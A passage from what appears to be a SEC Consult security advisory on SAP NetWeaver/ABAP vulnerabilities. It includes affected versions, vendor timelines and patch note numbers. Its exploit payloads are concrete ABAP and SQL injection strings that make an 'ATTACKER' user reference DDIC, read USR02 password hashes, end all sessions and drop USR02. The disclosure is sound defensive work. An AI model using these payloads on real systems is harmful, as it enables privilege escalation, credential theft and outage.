\u2552\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2555\n     \u2502 FIELDNM   \u2502 OP   \u2502 LOW                                        \u2502\n     \u255e\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2561\n     \u2502 BNAME     \u2502 EQ   \u2502 S\u0027ENDEXEC. EXEC SQL.UPDATE USREFUS SET     \u2502\n     \u2502           \u2502      \u2502 REFUSER = \u0027DDIC\u0027 WHERE BNAME = \u0027ATTACKER   \u2502\n     \u2558\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255b\n\n\n2) [CVE-2020-26808] Code Injection Vulnerability in SAP AS ABAP\n    and S/4 HANA (DMIS)\n\n    The vulnerable function makes use of the INSERT REPORT instruction\n    by providing source code that is created dynamically using untrusted\n    user input. As there is no input validation or output sanitization,\n    an attacker can inject malicious ABAP code through specific import\n    parameters. Inserted code may be executed by chaining this bug with\n    CVE-2021-21473. \n\n    The following payload exploits the bug to escalate privileges via\n    reference user assignment:\n\n    Import Parameter:    TABNAME\n    Value:               USR02\n\n    Import Table: IMT_SELSTRING\n     \u2552\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2555\n     \u2502 LINE                                                         \u2502\n     \u255e\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2561\n     \u2502 BNAME = \u0027TEST\u0027. ENDSELECT.                                   \u2502\n     \u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524\n     \u2502 UPDATE USREFUS SET REFUSER = \u0027DDIC\u0027 WHERE BNAME = \u0027ATTACKER\u0027 \u2502\n     \u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524\n     \u2502 SELECT * FROM USR02                                          \u2502\n     \u2558\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255b\n\n\n3) [CVE-2020-26832] Missing Authorization Check in SAP NetWeaver\n    AS ABAP and SAP S4 HANA (SAP Landscape Transformation)\n\n    The vulnerable function does not perform any explicit authorization\n    check. Depending on a specific import parameter, the function leaks\n    active logon sessions (opcode 02) or terminates all active logon\n    sessions (opcode 25) by kernel call \u0027ThUsrInfo\u0027. Invoking the function\n    periodically prevents users from logging into the application server. \n\n    The following payload exploits the bug to trigger the information\n    disclosure and enumerate active user sessions:\n\n    Import Parameter:\tMODE\n    Value:               1\n\n    The following payload exploits the bug to terminate all active user\n    sessions:\n\n    Import Parameter:\tMODE\n    Value:               2\n\n\n4) [CVE-2021-21468] Missing Authorization Check in SAP Business\n    Warehouse (Database Interface)\n\n    The vulnerable function does not perform any explicit authorization\n    check. It uses predefined classes and methods from the ABAP Database\n    Connectivity (ADBC) framework to execute native SQL queries at database\n    level. Depending on specific import parameters, this allows to read out\n    arbitrary table data including user master records or secure storages\n    (e.g. RSECTAB). \n\n    The following payload exploits the bug to exfiltrate user password\n    hashes:\n\n    Import Table: I_S_TABSEL\n     \u2552\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2555\n     \u2502 NAME                                                         \u2502\n     \u255e\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2561\n     \u2502 USR02                                                        \u2502\n     \u2558\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255b\n    Import Table: I_S_DBCON\n     \u2552\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2555\n     \u2502 CON_NAME                                                     \u2502\n     \u255e\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2561\n     \u2502 \u003cDatabase Connection String\u003e (e.g. DEFAULT)                  \u2502\n     \u2558\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255b\n    Import Table: I_T_DBFIELDS\n     \u2552\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2555\n     \u2502 NAME          \u2502 TYPE    \u2502   LENGTH                           \u2502\n     \u255e\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2561\n     \u2502 BNAME         \u2502 CHAR255 \u2502   000255                           \u2502\n     \u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524\n     \u2502 PWDSALTEDHASH \u2502 CHAR255 \u2502   000255                           \u2502\n     \u2558\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255b\n\n\n5) [CVE-2021-21465] Native SQL Injection Vulnerability in SAP\n    Business Warehouse (Database Interface)\n\n    The vulnerable function does not perform any input validation or\n    output sanitization on import parameters that can be used to define\n    conditional SQL statements. This allows to inject arbitrary SQL\n    commands that get executed natively at database level in the course\n    of execution of the function. \n\n    The following payload exploits the bug to escalate privileges via\n    reference user assignment:\n\n    Import Table: I_S_TABSEL\n     \u2552\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2555\n     \u2502 NAME                                                         \u2502\n     \u255e\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2561\n     \u2502 USR02                                                        \u2502\n     \u2558\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255b\n\n    Import Table: I_S_DBCON\n     \u2552\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2555\n     \u2502 CON_NAME                                                     \u2502\n     \u255e\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2561\n     \u2502 \u003cDatabase Connection String\u003e (e.g. DEFAULT)                  \u2502\n     \u2558\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255b\n\n    Import Table: I_T_DBFIELDS\n     \u2552\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2555\n     \u2502 NAME          \u2502 TYPE    \u2502   LENGTH                           \u2502\n     \u255e\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2561\n     \u2502 BNAME         \u2502 CHAR255 \u2502   000255                           \u2502\n     \u2558\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255b\n\n    Import Table: I_T_SELECT\n     \u2552\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2555\n     \u2502 FIELDNM              \u2502 OPTION \u2502LOW                           \u2502\n     \u255e\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2561\n     \u2502 BNAME                \u2502 EQ     \u2502\u0027\u0027;UPDATE USREFUS SET REFUSER \u2502\n     \u2502                      \u2502        \u2502=\u0027DDIC\u0027 WHERE \u00271              \u2502\n     \u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524\n     \u2502 \u0027 = \u00271 AND\u0027 AND BNAME\u2502 EQ     \u2502\u0027ATTACKER\u0027;                   \u2502\n     \u2558\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255b\n\n\n6) [CVE-2021-21466] Code Injection Vulnerability in SAP Business\n    Warehouse and SAP BW/4HANA\n\n    The vulnerable function makes use of the INSERT REPORT instruction\n    by providing source code that is created dynamically using untrusted\n    user input. As there is no input validation or output sanitization,\n    an attacker can inject malicious ABAP code through specific import\n    parameters. Inserted code may be executed by chaining this bug with\n    CVE-2021-21473. \n\n    The following payload exploits the bug to escalate privileges via\n    reference user assignment:\n\n    Import Parameter:\tI_TABLE_NAME\n    Value:               INJECTION\n\n    Import Parameter:\tI_DEBUG_SUFFIX\n    Value:               SAP\n\n    Import Table: I_T_RANGE_STRING\n     \u2552\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2555\n     \u2502 CHANM     \u2502 LOW                                 \u2502 HIGH       \u2502\n     \u255e\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2561\n     \u2502 BNAME     \u2502 \u0027. UPDATE USREFUS SET REFUSER       \u2502 \u0027. EXIT. \" \u2502\n     \u2502           \u2502 = \u0027DDIC\u0027 WHERE BNAME = \u0027ATTACKER    \u2502            \u2502\n     \u2558\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255b\n\n\n7) [CVE-2021-21473] Missing Authorization Check in SAP NetWeaver AS ABAP\n    and ABAP Platform\n\n    The vulnerable function uses a dynamically generated program name (based\n    on data from untrusted sources) in a SUBMIT call. No authorization checks\n    are programmatically enforced. Thus, a remote, unauthorized attacker can\n    leverage this function to start any existing ABAP report by providing the\n    respective report name in the import parameter REPORTNAME. \n\n\n8) [CVE-2021-33678] Code Injection vulnerability in SAP NetWeaver AS ABAP\n    (Reconciliation Framework)\n\n    The vulnerable function makes use of the GENERATE SUBROUTINE POOL instruction\n    in form \u0027get_dynamic_fields\u0027 by providing source code that is created\n    dynamically using untrusted user input. As there is no input validation or\n    output sanitization, an attacker can inject malicious ABAP code through specific\n    import parameters. These parameters are limited in size due to their variable\n    type. This restricts an attacker in exploitation scenarios. However, it is still\n    possible, for example, to delete critical system tables by exploiting this bug. \n\n    The following payload exploits the bug to drop table USR02, leading to a complete\n    loss of availability of the target system:\n\n    Import Parameter:\tRTABNAME\n    Value:               X. EXEC SQL. DROP TABLE USR02-\n\n    Import Parameter:\tRFIELDNAME\n    Value:               ENDEXEC\n\n\nVulnerable / tested versions:\n-----------------------------\nAll tests were conducted on SAP NetWeaver Application Server ABAP 752 SP04\nand ABAP Platform 1909. No additional testing on other releases has been\ncarried out. According to the vendor the following releases and versions\nare affected by the discovered vulnerabilities:\n\n1) SAP NetWeaver (ABAP Server) and ABAP Platform, Versions\n    - 700, 701, 702, 710, 711, 730, 731, 740, 750, 751, 752,\n    753, 754, 755\n    Components: SAP_BW, SAP_BW_VIRTUAL_COMP\n\n2) SAP AS ABAP (DMIS), Versions - 2011_1_620, 2011_1_640,\n    2011_1_700, 2011_1_710, 2011_1_730, 2011_1_731, 2011_1_752,\n    2020; SAP S4 HANA(DMIS), Versions - 101, 102, 103, 104, 105\n    Components: DMIS, S4CORE\n\n3) SAP NetWeaver AS ABAP (SAP Landscape Transformation - DMIS),\n    Versions - 2011_1_620, 2011_1_640, 2011_1_700, 2011_1_710,\n    2011_1_730, 2011_1_731, 2011_1_752, 2020; SAP S4 HANA\n    (SAP Landscape Transformation), Versions - 101, 102, 103,\n    104, 105\n    Components: DMIS, S4CORE\n\n4) SAP Business Warehouse, Versions - 710, 711, 730, 731, 740,\n    750, 751, 752, 753, 754, 755, 782\n    Components: SAP_BW, SAP_BW_VIRTUAL_COMP\n\n5) SAP Business Warehouse, Versions - 710, 711, 730, 731, 740,\n    750, 751, 752, 753, 754, 755, 782\n    Components: SAP_BW, SAP_BW_VIRTUAL_COMP\n\n6) SAP Business Warehouse, Versions - 700, 701, 702, 711, 730,\n    731, 740, 750, 782; SAP BW4HANA, Versions - 100, 200\n    Components: SAP_BW, DW4CORE\n\n7) SAP NetWeaver AS ABAP and ABAP Platform, Versions - 700,\n    702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755\n    Components: SAP_BASIS\n\n8) SAP NetWeaver AS ABAP (Reconciliation Framework) - 700, 701,\n    702, 710, 711, 730, 731, 740, 750, 751, 752, 75A, 75B, 75B,\n    75C, 75D, 75E, 75F\n    Components: SAP_ABA\n\n\nVendor contact timeline:\n------------------------\nThe following timelines have been split for each CVE/vulnerability, as different\ncontacts were responsible. All identified vulnerabilities have been fixed by now\nby SAP and SEC Consult releases this security advisory adhering to the\nresponsible disclosure policy. \n\n\nCVE-2020-6318\n--------------------------------\n2020-08-12 | Contacting vendor with detailed report through vulnerability\n              submission web form. \n2020-08-13 | Vendor confirms receipt and assigns security incident number\n              #2080354772. \n2020-08-19 | Vendor confirms vulnerability. \n2020-08-24 | Vendor informs about patch development strategy. \n2020-09-07 | Vendor informs about release of the patch, registration of CVE\n              number and corresponding security note. \n2020-09-08 | Vendor releases patch with SAP Security Note 2958563. \n\n\nCVE-2020-26808\n--------------------------------\n2020-09-24 | Contacting vendor with detailed report through vulnerability\n              submission web form. \n2020-09-25 | Vendor confirms receipt and assigns security incident number\n              #2070354293. \n2020-10-20 | Contacting vendor to request progress information. \n2020-10-21 | Vendor confirms vulnerability and states that a fix is in\n              development. \n2020-11-09 | Vendor informs about release of the patch, registration of CVE\n              number and corresponding security note. \n2020-11-10 | Vendor releases patch with SAP Security Note 2973735. \n\n\nCVE-2020-26832\n--------------------------------\n2020-10-23 | Contacting vendor with detailed report through vulnerability\n              submission web form. \n2020-10-26 | Vendor confirms receipt and assigns security incident number\n              #2070432866. \n2020-11-17 | Vendor confirms vulnerability and proposes CVSS score of 7.6. \n2020-11-23 | Vendor asks for exploit script shown in the initial report. \n2020-11-24 | Providing the requested script via encrypted PGP mail. \n2020-12-07 | Vendor informs about release of the patch, registration of CVE\n              number and corresponding security note. \n2020-12-08 | Vendor releases patch with SAP Security Note 2993132. \n\n\nCVE-2021-21465 / CVE-2021-21468\n--------------------------------\n2020-10-27 | Contacting vendor with detailed report through vulnerability\n              submission web form. \n2020-10-29 | Vendor confirms receipt and assigns separated security incident\n              numbers #2070446047 and #2070446050. \n2020-11-06 | Vendor confirms vulnerability and predicts patches to be released\n              on December Patch Tuesday 2020. \n2020-11-18 | Vendor confirms that they are still on track for December Patch\n              Tuesday 2020. \n2020-12-01 | Vendor informs that patch needs to be postponed to January Patch\n              Tuesday 2021. \n2021-01-08 | Vendor informs about release of patches and clarifies that a single\n              security note will fix both issues. Additional information about\n              CVSS scores is provided. \n2021-01-11 | Vendor informs about release of the patches, registration of CVE\n              numbers and corresponding security note. \n2021-01-12 | Vendor releases patches with SAP Security Note 2986980. \n\n\nCVE-2021-21466 / CVE-2021-21473\n--------------------------------\n2020-11-25 | Contacting vendor with detailed report through vulnerability\n              submission web form. \n2020-11-27 | Vendor confirms receipt and assigns security incident number\n              #2080396648. \n2021-01-04 | Vendor confirms vulnerability and states that they are working\n              on a fix. Additional information is provided detailing on that\n              they will split the reported finding into two separated security\n              issues and security incident numbers #2080396648 and #2080412695. \n2021-01-11 | Vendor informs about release of the first patch, registration of CVE\n              number and corresponding security note. \n2021-01-11 | Vendor informs about patch release for the first issue. Additional\n              information is provided describing that a patch for the second issue\n              is still in development. \n2021-01-12 | Vendor releases first patch with SAP Security Note 2999854. \n2021-05-07 | Asking vendor for update regarding the second issue. \n2021-05-11 | Vendor informs that fix is in progress and note will be released soon. \n2021-06-07 | Vendor informs about release of the second patch, registration of CVE\n              number and corresponding security note. \n2021-06-08 | Vendor releases second patch with SAP Security Note 3002517. \n\n\nCVE-2021-33678\n--------------------------------\n2021-02-01 | Contacting vendor with detailed report through vulnerability\n              submission web form. \n2021-02-03 | Vendor confirms receipt and assigns security incident number\n              #2180074995. \n2021-05-07 | Asking vendor for update. \n2021-05-11 | Vendor informs that fix is in progress. \n2021-07-12 | Vendor informs about release of the patch, registration of CVE\n              number and corresponding security note. \n2021-07-13 | Vendor releases patch with SAP Security Note 3048657. \n\n\nSolution:\n---------\nSAP SE reacted promptly to our findings. Product Security Incident Response\nTeam (PSRT) and engineers released patches in a timely manner for each of\nthe reported issues. These patches are available in form of SAP Security\nNotes which can be accessed via the SAP Customer Launchpad [5]. More\ninformation can also be found at the Official SAP Product Security Response\nSpace [6]. \n\nThe following Security Notes need to be implemented:\n\n2958563, 2973735, 2993132, 2986980, 2999854, 3002517, 3048657\n\n[5] https://launchpad.support.sap.com/#/securitynotes\n[6] 